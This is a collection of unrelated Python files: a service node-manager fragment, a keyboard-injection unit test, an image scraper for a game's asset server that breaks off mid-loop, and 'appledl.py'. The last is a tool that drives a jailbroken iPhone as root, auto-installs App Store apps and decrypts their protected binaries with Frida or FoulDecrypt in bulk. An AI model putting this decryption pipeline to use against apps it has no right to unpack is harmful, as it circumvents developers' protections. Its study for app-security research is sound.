def _do_remove_nodes(self, count):
"""Remove 'count' nodes, starting from the end of the list. This way
the BluePrint Hub gets removed last."""
for _ in range(count):
node = self.nodes.pop()
self.logger.info("Removing node with IP %s" % node.ip)
self.controller.delete_nodes([ node ])
self.state = self.S_RUNNING
@expose('GET')
def list_nodes(self, kwargs):
"""Return a list of running nodes"""
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'list_nodes' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
node_ids = [node.id for node in self.nodes ]
return HttpJsonResponse({
'node': node_ids
})
@expose('GET')
def get_service_info(self, kwargs):
"""Return the service state and type"""
return HttpJsonResponse({'state': self.state, 'type': 'blueprint'})
@expose('GET')
def get_node_info(self, kwargs):
"""Return information about the node identified by the given
kwargs['serviceNodeId']"""
# serviceNodeId is a required parameter
if 'serviceNodeId' not in kwargs:
vals = { 'arg': 'serviceNodeId' }
return HttpErrorResponse(self.REQUIRED_ARG_MSG % vals)
serviceNodeId = kwargs.pop('serviceNodeId')
serviceNode = None
for node in self.nodes:
if serviceNodeId == node.id:
serviceNode = node
break
if serviceNode is None:
return HttpErrorResponse(
'ERROR: Cannot find node with serviceNode=%s' % serviceNodeId)
return HttpJsonResponse({
'serviceNode': {
'id': serviceNode.id,
'ip': serviceNode.ip
}
})
@expose('GET')
def test(self, kwargs):
"""Return test messages from all the agents"""
msgsum = ''
for node in self.nodes:
msgsum += client.test(node.ip, self.AGENT_PORT)['msg'] + '\n'
return HttpJsonResponse({'msgs': msgsum})
|
checkTagTest.py
|
from time import sleep
import unittest
import tracemalloc
import threading
from pynput.keyboard import Key, Controller
import os
from checkTag import CheckTag
os.system("clear")
tracemalloc.start()
# Incorrect, Incorrect, Correct, Incorrect len, Correct, Correct test-tag
tagList = ["67523475", "876348574", "952224470", "7978497850", "537059654", "101051865"]
keyboard = Controller()
def sendKeys():
for tag in tagList:
sleep(10)
keyboard.type(tag)
keyboard.press(Key.enter)
keyboard.release(Key.enter)
class Test(unittest.TestCase):
def test_checkTag(self):
threading.Thread(target=lambda: sendKeys()).start()
CheckTag()
if __name__ == '__main__':
unittest.main()
|
appledl.py
|
# stdlib
import os
import pathlib
import shutil
import signal
import subprocess
import tempfile
import threading
import time
# external
from cachetools import TTLCache # dict with timout
from scp import SCPClient # ssh copy directories
from tqdm import tqdm # progress bar
from zxtouch import touchtypes, toasttypes
from zxtouch.client import zxtouch # simulate touch input on device
import frida # run scripts on device
import paramiko # ssh
# internal
import ipadumper
from ipadumper.utils import get_logger, itunes_info, progress_helper, free_port
class AppleDL:
'''
Downloader instance for a single device
    On initialization two iproxy processes are started: one for ssh and one for zxtouch.
    Then an ssh and a frida connection are established and the template images are copied to the device with scp.
'''
def __init__(
self,
udid=None,
device_address='localhost',
ssh_key_filename='iphone',
local_ssh_port=0,
local_zxtouch_port=0,
image_base_path_device='/private/var/mobile/Library/ZXTouch/scripts/appstoredownload.bdl',
image_base_path_local=os.path.join(os.path.dirname(ipadumper.__file__), 'appstore_images'),
theme='dark',
lang='en',
timeout=15,
log_level='info',
init=True,
):
self.udid = udid
self.device_address = device_address
self.ssh_key_filename = ssh_key_filename
self.local_ssh_port = local_ssh_port
self.local_zxtouch_port = local_zxtouch_port
self.image_base_path_device = image_base_path_device
self.image_base_path_local = image_base_path_local
self.theme = theme
self.lang = lang
self.timeout = timeout
self.log_level = log_level
self.log = get_logger(log_level, name=__name__)
signal.signal(signal.SIGINT, self.__signal_handler)
signal.signal(signal.SIGTERM, self.__signal_handler)
self.running = True
self.processes = []
# self.file_dict = {}
self.installed_cached = TTLCache(maxsize=1, ttl=2)
self.log.debug('Logging is set to debug')
self.init_frida_done = False
self.init_ssh_done = False
self.init_zxtouch_done = False
self.init_images_done = False
if not self.device_connected():
self.cleanup()
elif init is True:
if not self.init_all():
self.cleanup()
def __del__(self):
if self.running:
self.cleanup()
def __signal_handler(self, signum, frame):
self.log.info('Received exit signal')
self.cleanup()
def cleanup(self):
self.log.debug('Clean up...')
self.running = False
self.log.info('Disconnecting from device')
try:
self.finished.set()
self.device.disconnect()
self.sshclient.close()
except AttributeError:
pass
# close all processes
for idx, p in enumerate(self.processes, start=1):
self.log.debug(f'Stopping process {idx}/{len(self.processes)}')
p.terminate()
p.wait()
# threads
for t in threading.enumerate():
if t.name != 'MainThread' and t.is_alive():
self.log.debug(f'Running thread: {t.name}')
self.log.debug('Clean up done')
def init_all(self):
'''
return success
'''
        if not self.init_frida() or not self.init_ssh() or not self.init_zxtouch() or not self.init_images():
return False
return True
def device_connected(self):
'''
return True if a device is available else return False
'''
if self.udid is None:
returncode = subprocess.call(
['ideviceinfo'], encoding='utf-8', stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
if returncode == 0:
return True
else:
self.log.error('No device found')
return False
else:
returncode = subprocess.call(
['ideviceinfo', '--udid', self.udid], encoding='utf-8', stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
if returncode == 0:
return True
else:
self.log.error(f'Device {self.udid} not found')
return False
def init_frida(self):
'''
set frida device
return success
'''
try:
if self.udid is None:
self.frida_device = frida.get_usb_device()
else:
self.frida_device = frida.get_device(self.udid)
except frida.InvalidArgumentError:
self.log.error('No Frida USB device found')
return False
self.init_frida_done = True
return True
def init_ssh(self):
'''
Initializing SSH connection to device
return success
'''
# start iproxy for SSH
if self.local_ssh_port == 0:
self.local_ssh_port = free_port()
if self.udid is None:
self.__run_cmd(['iproxy', str(self.local_ssh_port), '22'])
else:
self.__run_cmd(['iproxy', '--udid', self.udid, str(self.local_ssh_port), '22'])
time.sleep(0.1)
self.log.debug('Connecting to device via SSH')
# pkey = paramiko.Ed25519Key.from_private_key_file(self.ssh_key_filename)
self.sshclient = paramiko.SSHClient()
# client.load_system_host_keys()
self.sshclient.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
self.sshclient.connect(
'localhost', port=self.local_ssh_port, username='root', key_filename=self.ssh_key_filename
)
except FileNotFoundError:
self.log.error(f'Could not find ssh keyfile "{self.ssh_key_filename}"')
return False
except (EOFError, ConnectionResetError, paramiko.ssh_exception.SSHException):
self.log.error('Could not connect to establish SSH connection')
return False
self.init_ssh_done = True
return True
def init_zxtouch(self):
# start iproxy for zxtouch
if self.local_zxtouch_port == 0:
self.local_zxtouch_port = free_port()
if self.udid is None:
self.__run_cmd(['iproxy', str(self.local_zxtouch_port), '6000'])
else:
self.__run_cmd(['iproxy', '--udid', self.udid, str(self.local_zxtouch_port), '6000'])
self.log.info(f'Connecting to device at {self.device_address}:{self.local_zxtouch_port}')
try:
self.device = zxtouch(self.device_address, port=self.local_zxtouch_port)
except ConnectionRefusedError:
self.log.error('Error connecting to zxtouch on device. Make sure iproxy is running')
self.cleanup()
return False
self.init_zxtouch_done = True
return True
def init_images(self):
'''
Copy template images from local folder to device
return success
'''
# check directory structure
try:
_, dirnames_themes, _ = next(os.walk(self.image_base_path_local))
except StopIteration:
self.log.error(f'Image directory not found: {self.image_base_path_local}')
return False
theme_path = os.path.join(self.image_base_path_local, self.theme)
lang_path = os.path.join(self.image_base_path_local, self.theme, self.lang)
if self.theme in dirnames_themes:
_, dirnames_langs, filenames_theme = next(os.walk(theme_path))
if self.lang not in dirnames_langs:
self.log.error(f'Language directory "{self.lang}" not found in {theme_path}')
return False
else:
self.log.error(f'Theme directory "{self.theme}" not found in {self.image_base_path_local}')
return False
# check if all images exist locally
image_names_unlabeled = ['cloud.png']
image_names_labeled = ['dissallow.png', 'get.png', 'install.png']
_, _, filenames_lang = next(os.walk(lang_path))
for image_name_labeled in image_names_labeled:
if image_name_labeled not in filenames_lang:
self.log.error(f'Image {image_name_labeled} not found in {lang_path}')
return False
for image_name_unlabeled in image_names_unlabeled:
if image_name_unlabeled not in filenames_theme:
self.log.error(f'Image {image_name_unlabeled} not found in {theme_path}')
return False
# transfer images over SSH
try:
with SCPClient(self.sshclient.get_transport(), socket_timeout=self.timeout) as scp:
for labeled_img in image_names_labeled:
scp.put(os.path.join(lang_path, labeled_img), self.image_base_path_device)
for unlabeled_img in image_names_unlabeled:
unlabeled_img_path = os.path.join(theme_path, unlabeled_img)
scp.put(unlabeled_img_path, self.image_base_path_device)
except OSError:
self.log.error('Could not copy template images to device')
return False
self.init_images_done = True
return True
def ssh_cmd(self, cmd):
'''
execute command via ssh and iproxy
return exitcode, stdout, stderr
'''
if not self.init_ssh_done:
if not self.init_ssh():
return 1, '', ''
self.log.debug(f'Run ssh cmd: {cmd}')
stdin, stdout, stderr = self.sshclient.exec_command(cmd)
exitcode = stdout.channel.recv_exit_status()
out = ''
err = ''
for line in stdout:
out += line
for line in stderr:
err += line
if exitcode != 0 or out != '' or err != '':
self.log.debug(f'Exitcode: {exitcode}\nSTDOUT:\n{out}STDERR:\n{err}DONE')
return exitcode, out, err
def __log_cmd(self, pipe, err):
with pipe:
for line in iter(pipe.readline, b''): # b'\n'-separated lines
if err is True:
self.log.warning(f"got err line from subprocess: {line.decode('utf-8').rstrip()}")
else:
self.log.info(f"got out line from subprocess: {line.decode('utf-8').rstrip()}")
if err is True:
self.log.debug('Terminating stderr output thread')
else:
self.log.debug('Terminating stdout output thread')
def __run_cmd(self, cmd):
'''
Start external program and log stdout + stderr
'''
cmd_str = ' '.join(cmd)
self.log.info(f'Starting: {cmd_str}')
p = subprocess.Popen(cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
# start logging threads: one for stderr and one for stdout
t_out = threading.Thread(target=self.__log_cmd, args=(p.stdout, False))
t_err = threading.Thread(target=self.__log_cmd, args=(p.stderr, True))
self.processes.append(p)
# t_out.daemon = True
# t_err.daemon = True
t_out.name = ' '.join(cmd[:3]) # + '-out'
t_err.name = ' '.join(cmd[:3]) # + '-err'
t_out.start()
t_err.start()
def __is_installed(self, bundleId):
'''
return version code if app is installed else return False
'''
try:
out = self.installed_cached[0]
except KeyError:
if self.udid is None:
out = subprocess.check_output(['ideviceinstaller', '-l'], encoding='utf-8')
else:
out = subprocess.check_output(['ideviceinstaller', '--udid', self.udid, '-l'], encoding='utf-8')
# cache output
self.installed_cached[0] = out
for line in out.splitlines()[1:]:
CFBundleIdentifier, CFBundleVersion, CFBundleDisplayName = line.split(', ')
if CFBundleIdentifier == bundleId:
version = CFBundleVersion.strip('"')
displayName = CFBundleDisplayName.strip('"')
self.log.debug(f'Found installed app {bundleId}: {version} ({displayName})')
return version
return False
def __match_image(self, image_name, acceptable_value=0.9, max_try_times=1, scaleRation=1):
'''
get image from image_dir_device + image_name
if matching return x,y coordinates from the middle
else return False
'''
path = f'{self.image_base_path_device}/{image_name}'
result_tuple = self.device.image_match(path, acceptable_value, max_try_times, scaleRation)
if result_tuple[0] is not True:
raise Exception(f'Error while matching {image_name}: {result_tuple[1]}')
else:
result_dict = result_tuple[1]
width = int(float(result_dict['width']))
height = int(float(result_dict['height']))
x = int(float(result_dict['x']))
y = int(float(result_dict['y']))
if width != 0 and height != 0:
middleX = x + (width // 2)
middleY = y + (height // 2)
self.log.debug(
f'Matched {image_name}: x,y: {x},{y}\t size: {width},{height}\t middle: {middleX},{middleY}'
)
return middleX, middleY
else:
self.log.debug(f'Match failed. Cannot find {image_name} on screen.')
return False
def __tap(self, xy, message=''):
'''
Simulate touch input (single tap) and show toast message on device
'''
x, y = xy
self.log.debug(f'Tapping {xy} {message}')
self.device.show_toast(toasttypes.TOAST_WARNING, f'{message} ({x},{y})', 1.5)
self.device.touch(touchtypes.TOUCH_DOWN, 1, x, y)
time.sleep(0.1)
self.device.touch(touchtypes.TOUCH_UP, 1, x, y)
def __wake_up_device(self):
'''
Normally not needed.
Install (uiopen) wakes up device too
'''
self.log.info('Unlocking device if not awake..')
self.ssh_cmd('activator send libactivator.system.homebutton')
time.sleep(0.5)
self.ssh_cmd('activator send libactivator.system.homebutton')
time.sleep(0.5)
def dump_fouldecrypt(self, target, output, timeout=120, disable_progress=False, copy=True):
'''
Dump IPA by using FoulDecrypt
        When copy is False, the app directory on the device is modified in place, which is faster than copying everything first
Return success
'''
if not self.init_ssh_done:
if not self.init_ssh():
return False
self.log.debug(f'{target}: Start dumping with FoulDecrypt.')
# get path of app
apps_dir = '/private/var/containers/Bundle/Application/'
cmd = f'grep --only-matching {target} {apps_dir}*/iTunesMetadata.plist'
ret, stdout, stderr = self.ssh_cmd(cmd)
if ret != 0:
self.log.error(f'grep returned {ret} {stderr}')
return False
target_dir = stdout.split('/iTunesMetadata.plist ')[0].split(' ')[-1]
# get app directory name
cmd = f'ls -d {target_dir}/*/'
ret, stdout, stderr = self.ssh_cmd(cmd)
if ret != 0:
self.log.error(f'ls -d returned {ret} {stderr}')
return False
app_dir = stdout.strip().rstrip('/').split('/')[-1]
if not app_dir.endswith('.app'):
self.log.error(f'App directory does not end with .app: {app_dir}')
return False
app_bin = app_dir[:-4]
if copy is True:
orig_target_dir = target_dir
target_dir = target_dir + '_tmp'
cmd = f'cp -r {orig_target_dir} {target_dir}'
ret, stdout, stderr = self.ssh_cmd(cmd)
if ret != 0:
self.log.error(f'cp -r returned {ret} {stderr}')
return False
bin_path = target_dir + '/' + app_dir + '/' + app_bin
# decrypt binary and replace
self.log.debug(f'{target}: Decrypting binary with fouldecrypt')
cmd = f'/usr/local/bin/fouldecrypt -v {bin_path} {bin_path}'
ret, stdout, stderr = self.ssh_cmd(cmd)
if ret != 0:
self.log.error(f'fouldecrypt returned {ret} {stderr}')
return False
# prepare for zipping, create Payload folder
cmd = f'mkdir {target_dir}/Payload'
ret, stdout, stderr = self.ssh_cmd(cmd)
if ret != 0:
self.log.error(f'mkdir returned {ret} {stderr}')
return False
cmd = f'mv {target_dir}/{app_dir} {target_dir}/Payload'
ret, stdout, stderr = self.ssh_cmd(cmd)
if ret != 0:
self.log.error(f'mv returned {ret} {stderr}')
return False
self.log.debug(f'{target}: Set access and modified date to 0 for reproducible zip files')
cmd = f'find {target_dir} -exec touch -m -d "1/1/1980" {{}} +'
ret, stdout, stderr = self.ssh_cmd(cmd)
if ret != 0:
self.log.error(f'find+touch returned {ret} {stderr}')
return False
# zip
self.log.debug(f'{target}: Creating zip')
cmd = f'cd {target_dir} && zip -qrX out.zip . -i "Payload/*"'
ret, stdout, stderr = self.ssh_cmd(cmd)
if ret != 0:
self.log.error(f'zip returned {ret} {stderr}')
return False
# transfer out.zip
bar_fmt = '{desc:20.20} {percentage:3.0f}%|{bar:20}{r_bar}'
self.log.debug(f'{target}: Start transfer. {output}')
with tqdm(unit="B", unit_scale=True, miniters=1, bar_format=bar_fmt, disable=disable_progress) as t:
pr = progress_helper(t)
with SCPClient(self.sshclient.get_transport(), socket_timeout=self.timeout, progress=pr) as scp:
scp.get(target_dir + '/out.zip', output)
if copy is True:
self.log.debug('Clean up temp directory on device')
cmd = f'rm -rf {target_dir}'
ret, stdout, stderr = self.ssh_cmd(cmd)
if ret != 0:
self.log.error(f'rm returned {ret} {stderr}')
return False
return True
def dump_frida(
self,
target,
output,
timeout=120,
disable_progress=False,
dumpjs_path=os.path.join(os.path.dirname(ipadumper.__file__), 'dump.js'),
):
'''
target: Bundle identifier of the target app
output: Specify name of the decrypted IPA
dumpjs_path: path to dump.js
        timeout: timeout in seconds for the dump to finish
disable_progress: disable progress bars
return success
partly copied from
https://github.com/AloneMonkey/frida-ios-dump/blob/9e75f6bca34f649aa6fcbafe464eca5d624784d6/dump.py
MIT License
Copyright (c) 2017 Alone_Monkey
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
if not self.init_ssh_done:
if not self.init_ssh():
return False
if not self.init_frida_done:
if not self.init_frida():
return False
bar_fmt = '{desc:20.20} {percentage:3.0f}%|{bar:20}{r_bar}'
temp_dir = tempfile.mkdtemp()
self.log.debug(f'{target}: Start dumping with Frida. Temp dir: {temp_dir}')
payload_dir = os.path.join(temp_dir, 'Payload')
os.mkdir(payload_dir)
self.finished = threading.Event()
file_dict = {}
def generate_ipa():
self.log.debug(f'{target}: Generate ipa')
for key, value in file_dict.items():
from_dir = os.path.join(payload_dir, key)
to_dir = os.path.join(payload_dir, file_dict['app'], value)
if key != 'app':
# try:
# cmp = filecmp.cmp(from_dir, to_dir)
# except FileNotFoundError:
# print(f'new: {from_dir}')
# print(f'cmp is {cmp}, move {key} from {from_dir} to {to_dir}')
shutil.move(from_dir, to_dir)
self.log.debug(f'{target}: Set access and modified date to 0 for reproducible zip files')
for f in pathlib.Path(temp_dir).glob('**/*'):
os.utime(f, (0, 0))
zip_args = ('zip', '-qrX', os.path.join(os.getcwd(), output), 'Payload')
self.log.debug(f'{target}: Run zip: {zip_args}')
try:
subprocess.check_call(zip_args, cwd=temp_dir)
except subprocess.CalledProcessError as err:
self.log.error(f'{target}: {zip_args} {str(err)}')
def on_message(message, data):
'''
callback function for dump messages
receives paths and copies them with scp
'''
t = threading.currentThread()
t.name = f'msg-{target}'
try:
payload = message['payload']
except KeyError:
self.log.warning(f'{target}: No payload in message')
self.log.debug(f'Message: {message}')
return
if 'info' in payload:
self.log.debug(f"{target}: {payload['info']}")
if 'warn' in payload:
self.log.warning(f"{target}: {payload['warn']}")
if 'dump' in payload:
index = payload['path'].find('.app/') + 5
file_dict[os.path.basename(payload['dump'])] = payload['path'][index:]
with tqdm(unit="B", unit_scale=True, miniters=1, bar_format=bar_fmt, disable=disable_progress) as t:
pr = progress_helper(t)
with SCPClient(self.sshclient.get_transport(), socket_timeout=self.timeout, progress=pr) as scp:
scp.get(payload['dump'], payload_dir + '/')
chmod_dir = os.path.join(payload_dir, os.path.basename(payload['dump']))
chmod_args = ('chmod', '655', chmod_dir)
try:
subprocess.check_call(chmod_args)
except subprocess.CalledProcessError as err:
self.log.error(f'{target}: {chmod_args} {str(err)}')
if 'app' in payload:
with tqdm(unit="B", unit_scale=True, miniters=1, bar_format=bar_fmt, disable=disable_progress) as t:
pr = progress_helper(t)
with SCPClient(self.sshclient.get_transport(), socket_timeout=self.timeout, progress=pr) as scp:
scp.get(payload['app'], payload_dir + '/', recursive=True)
chmod_dir = os.path.join(payload_dir, os.path.basename(payload['app']))
chmod_args = ('chmod', '755', chmod_dir)
try:
subprocess.check_call(chmod_args)
except subprocess.CalledProcessError as err:
self.log.error(f'{target}: {chmod_args} {str(err)}')
file_dict['app'] = os.path.basename(payload['app'])
if 'done' in payload:
self.finished.set()
self.log.debug(f'{target}: Opening app')
self.ssh_cmd(f'open {target}')
time.sleep(0.1)
# create frida session
apps = self.frida_device.enumerate_applications()
session = None
for app in apps:
if app.identifier == target:
if app.pid == 0:
self.log.error(f'{target}: Could not start app')
return
session = self.frida_device.attach(app.pid)
# run script
with open(dumpjs_path) as f:
jsfile = f.read()
script = session.create_script(jsfile)
script.on('message', on_message)
self.log.debug(f'{target}: Loading script')
script.load()
script.post('dump')
success = False
if self.finished.wait(timeout=timeout):
if self.running:
generate_ipa()
self.log.debug(f'{target}: Dumping finished. Clean up temp dir {temp_dir}')
success = True
else:
self.log.debug(f'{target}: Cancelling dump. Clean up temp dir {temp_dir}')
else:
self.log.error(f'{target}: Timeout of {timeout}s exceeded. Clean up temp dir {temp_dir}')
shutil.rmtree(temp_dir)
if session:
session.detach()
return success
def bulk_decrypt(self, itunes_ids, timeout_per_MiB=0.5, parallel=3, output_directory='ipa_output', country='us'):
'''
Installs apps, decrypts and uninstalls them
In parallel!
itunes_ids: list of int with the iTunes IDs
'''
if type(itunes_ids[0]) != int:
self.log.error('bulk_decrypt: list of int needed')
return False
total = len(itunes_ids)
wait_for_install = [] # apps that are currently downloading and installing
done = [] # apps that are uninstalled
waited_time = 0
while len(itunes_ids) > 0 or len(wait_for_install) > 0:
self.log.debug(f'Done {len(done)}/{total}, installing: {len(wait_for_install)}')
if len(itunes_ids) > 0 and len(wait_for_install) < parallel:
# install app
self.log.info(f'Installing, len: {len(wait_for_install)}')
itunes_id = itunes_ids.pop()
trackName, version, bundleId, fileSizeMiB, price, currency = itunes_info(
itunes_id, log_level=self.log_level, country=country
)
app = {'bundleId': bundleId, 'fileSizeMiB': fileSizeMiB, 'itunes_id': itunes_id, 'version': version}
if price != 0:
self.log.warning(f'{bundleId}: Skipping, app is not for free ({price} {currency})')
continue
if self.__is_installed(bundleId) is not False:
self.log.info(f'{bundleId}: Skipping, app already installed')
total -= 1
# subprocess.check_output(['ideviceinstaller', '--uninstall', bundleId])
continue
wait_for_install.append(app)
self.install(itunes_id)
self.log.info(f'{bundleId}: Waiting for download and installation to finish ({fileSizeMiB} MiB)')
else:
# check if an app installation has finished
# if yes then dump app else wait for an install to finish
# also check if a dump has finished. If yes then uninstall app
install_finished = False
to_download_size = 0
for app in wait_for_install:
if self.__is_installed(app['bundleId']) is not False:
# dump app
self.log.info(
f"{app['bundleId']}: Download and installation finished. Opening app and starting dump"
)
install_finished = True
waited_time = 0
# waited_time -= app['fileSizeMiB'] * timeout_per_MiB
# if waited_time < 0:
# waited_time = 0
wait_for_install.remove(app)
try:
os.mkdir(output_directory)
except FileExistsError:
pass
name = f"{app['itunes_id']}_{app['bundleId']}_{app['version']}.ipa"
output = os.path.join(output_directory, name)
timeout = self.timeout + app['fileSizeMiB'] // 2
disable_progress = False if self.log_level == 'debug' else True
self.dump_frida(app['bundleId'], output, timeout=timeout, disable_progress=disable_progress)
# uninstall app after dump
self.log.info(f"{app['bundleId']}: Uninstalling")
if self.udid is None:
subprocess.check_output(['ideviceinstaller', '--uninstall', app['bundleId']])
else:
subprocess.check_output(
['ideviceinstaller', '--udid', self.udid, '--uninstall', app['bundleId']]
)
done.append(app)
else:
# recalculate remaining download size
to_download_size += app['fileSizeMiB']
# wait for an app to finish installation
if install_finished is False:
self.log.debug(f'Need to download {to_download_size} MiB')
if waited_time > self.timeout + timeout_per_MiB * to_download_size:
self.log.error(
f'Timeout exceeded. Waited time: {waited_time}. Need to download: {to_download_size} MiB'
)
self.log.debug(f'Wait for install queue: {wait_for_install}')
return False
else:
waited_time += 1
time.sleep(1)
def install(self, itunes_id):
'''
        Opens the app page in the App Store on the device and simulates touch input to download and install the app.
        If there is a cloud (re-download) button, tap it and we are done.
        Else if there is a get button, tap it, wait, and confirm with the install button.
return success
'''
if not self.init_images_done:
if not self.init_images():
return False
if not self.init_zxtouch_done:
if not self.init_zxtouch():
return False
# get rid of permission request popups
while True:
dissallow_xy = self.__match_image('dissallow.png')
if dissallow_xy is not False:
self.log.debug('Dissallow permission request')
self.__tap(dissallow_xy, message='dissallow')
time.sleep(0.1)
else:
break
self.ssh_cmd(f'uiopen https://apps.apple.com/de/app/id{str(itunes_id)}')
self.log.debug(f'ID {itunes_id}: Waiting for get or cloud button to appear')
dl_btn_wait_time = 0
while dl_btn_wait_time <= self.timeout:
dl_btn_wait_time += 1
time.sleep(1)
dl_btn_xy = self.__match_image('get.png')
if dl_btn_xy is False:
dl_btn_xy = self.__match_image('cloud.png')
if dl_btn_xy is False:
continue
else:
# tap and done
self.__tap(dl_btn_xy, 'cloud')
return True
else:
self.__tap(dl_btn_xy, 'get')
break
if dl_btn_wait_time > self.timeout:
self.log.warning(f'ID {itunes_id}: No download button found after {self.timeout}s')
return False
# tap and need to wait and confirm with install button
self.__tap(dl_btn_xy, 'load')
self.log.debug(f'ID {itunes_id}: Waiting for install button to appear')
install_btn_wait_time = 0
while install_btn_wait_time <= self.timeout:
install_btn_wait_time += 1
time.sleep(1)
install_btn_xy = self.__match_image('install.png')
if install_btn_xy is not False:
self.__tap(install_btn_xy, 'install')
return True
self.log.warning(f'ID {itunes_id}: No install button found after {self.timeout}s')
return False
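if __name__ == '__main__':
    # Minimal usage sketch (hypothetical iTunes ID, bundle id and output name):
    # it assumes a jailbroken device with zxtouch installed and the 'iphone' ssh key present.
    dumper = AppleDL(ssh_key_filename='iphone', log_level='debug')
    if dumper.running:
        dumper.install(1234567890)
        dumper.dump_frida('com.example.app', 'com.example.app.ipa')
        # dumper.bulk_decrypt([1234567890])  # alternative: batch install + dump + uninstall
        dumper.cleanup()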
|
pyGBFweapon.py
|
# Batch download GBF weapon artwork
from queue import Queue
import os
import time
import threading
import urllib.request
import urllib.error
import datetime
import sys
sys.path.append(".")
import pyDownload as download
dirname = os.getcwd()
print_lock = threading.Lock()
data_q = Queue()
SAVELINK = False
DEBUG = False
# chara[R/SR/SSR/skin] quest[r/sr/ssr/extra] summon[n/r/sr/ssr] zoom[r/sr/ssr/skin] mypage[r/sr/ssr/skin] class cover bg chara[extra] zoom[extra]
groupstack = [-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1,]
grouptop = [0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0]
prefix1 = "http://game-a1.granbluefantasy.jp/assets/img/sp/assets/weapon/"
groupstr = ["100","101","102","103","104","105","106","107","108","109",
"200","201","202","203","204","205","206","207","208","209",
"300","301","302","303","304","305","306","307","308","309",
"400","401","402","403","404","405","406","407","408","409"]
# chara[R/SR/SSR/skin] quest[r/sr/ssr/extra] summon[n/r/sr/ssr] zoom[r/sr/ssr/skin] mypage[r/sr/ssr/skin] class cover
groupdir = ["img\\weapon\\n","img\\weapon\\r","img\\weapon\\sr","img\\weapon\\ssr"]
#quest extra needs big step
groupstep = [20,20,20,20,20,20,20,20,20,20,
20, 20, 20, 20, 20, 20, 20, 20, 20, 20,
20, 20, 20, 20, 20, 20, 20, 20, 20, 20,
20, 20, 20, 20, 20, 20, 20, 20, 20, 20]
grouplink = ["link\\wp-n.txt","link\\wp-r.txt","link\\wp-sr.txt","link\\wp-ssr.txt"]
MaxThread = 40
def wpimglist(groupid):
list = []
# 3040001000_01
for index in range(groupstack[groupid]+1, groupstack[groupid]+1+groupstep[groupid]):
list.append(imgName(index, groupid, 0))
return list
def mkdir(path):
tmppath = os.getcwd()+"\\"+path
try:
os.makedirs(tmppath)
except:
pass
return tmppath
class imgName:
id = 0
groupid = 0
#dirid = 0
suffix = 1
def __init__(self, id, groupid, suffix = 1):
self.id = id
self.groupid = groupid
#self.dirid = dirid
self.suffix = suffix
def __str__(self):
thisstr = "["+ str(self.id)+","+str(self.groupid)+"]"
return thisstr
def saveIndex(imgData):
time.sleep(0.1)
with print_lock:
imgName = "10"+ groupstr[imgData.groupid] + str(imgData.id).zfill(3)+"00"
iddir = imgData.groupid //10
dir = groupdir[iddir]
count = 0
try:
url = prefix1 + "m/" + imgName +".jpg"
if(download.saveImg(url,dir+"\\m")):
count+=1
if(SAVELINK):
#print(grouplink[imgData.groupid])
#print(imgData.url)
with open(grouplink[iddir],"a") as linkfile:
linkfile.write(url+"\n")
except:
pass
try:
url = prefix1 + "b/" + imgName +".png"
if(download.saveImg(url,dir+"\\b")):
count+=1
if(SAVELINK):
#print(grouplink[imgData.groupid])
#print(imgData.url)
with open(grouplink[iddir],"a") as linkfile:
linkfile.write(url+"\n")
except:
pass
try:
url = prefix1 + "ls/" + imgName +".jpg"
if(download.saveImg(url,dir+"\\ls")):
count+=1
if(SAVELINK):
#print(grouplink[imgData.groupid])
#print(imgData.url)
with open(grouplink[iddir],"a") as linkfile:
linkfile.write(url+"\n")
except:
pass
#update logic
if(count >0 ):
if(imgData.id > groupstack[imgData.groupid]):
print("update list " + groupdir[iddir])
groupstack[imgData.groupid] += groupstep[imgData.groupid]
simglist = []
simglist = wpimglist(imgData.groupid)
for iimg in simglist:
data_q.put(iimg)
simglist.clear()
if(imgData.id>grouptop[imgData.groupid]):
grouptop[imgData.groupid] = imgData.id
def worker():
while True:
imgData1 = data_q.get()
#print(imgData1)
saveIndex(imgData1)
data_q.task_done()
def main():
#socket.setdefaulttimeout(10)
if(sys.version_info.major != 3):
print("This script only works for python3")
return
try:
logdata = ""
with open("img\\weapon\\log.txt") as logfile:
lines = logfile.readlines()
logdata = lines[1]
if (logdata != ""):
data = logdata.split(',')
            numgroup = len(groupstack)
            # the log line ends with a trailing comma, so expect one extra (empty) field
            if (len(data) == numgroup + 1):
print("download start from latest")
for i in range(0, numgroup):
groupstack[i] = int(data[i])
grouptop[i] = int(data[i])
except:
pass
for x in range(MaxThread):
t = threading.Thread(target = worker)
t.daemon = True
t.start()
for idir in groupdir:
mkdir(idir)
mkdir(idir+"\\m")
mkdir(idir + "\\b")
mkdir(idir + "\\ls")
mkdir("link")
start = time.time()
simglist = []
# init
for index in range(0,40):
simglist = wpimglist(index)
for iimg in simglist:
data_q.put(iimg)
simglist.clear()
data_q.join()
print("entire job took:", time.time()-start)
# today = str(datetime.date.today())
with open("img\\weapon\\log.txt", "w", encoding='utf-8') as logfile:
istr = "weapon [n|r|sr|ssr][sword|blade|spear|axe|staff|gun|fist|bow|harp|katana]\n"
logfile.write(istr)
for ilog in grouptop:
